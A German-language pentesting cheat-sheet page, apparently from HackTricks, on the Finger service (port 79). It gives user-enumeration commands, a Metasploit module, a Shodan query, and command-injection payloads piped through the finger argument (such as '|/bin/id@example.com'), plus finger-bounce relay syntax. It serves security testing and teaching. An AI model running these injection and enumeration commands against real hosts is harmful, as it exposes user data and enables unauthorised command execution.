# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **Grundinformationen** Das **Finger**-Programm/-Dienst wird verwendet, um Details über Computerbenutzer abzurufen. Typischerweise umfasst die bereitgestellte Information den **Benutzernamen, den vollständigen Namen** und in einigen Fällen zusätzliche Details. Diese zusätzlichen Details können den Bürostandort und die Telefonnummer (sofern verfügbar), die Zeit, zu der sich der Benutzer angemeldet hat, die Inaktivitätsdauer (Leerlaufzeit), den letzten Zeitpunkt, an dem die E-Mail vom Benutzer gelesen wurde, sowie den Inhalt der Plan- und Projektdateien des Benutzers umfassen. **Standardport:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Enumeration** ### **Banner Grabbing/Grundlegende Verbindung** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Benutzerauszählung** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternativ können Sie **finger-user-enum** von [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) verwenden, einige Beispiele: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap führt ein Skript aus, um Standard-Skripte zu verwenden** ### Metasploit verwendet mehr Tricks als Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## Befehlsausführung ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Verwenden Sie ein System als Finger-Relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}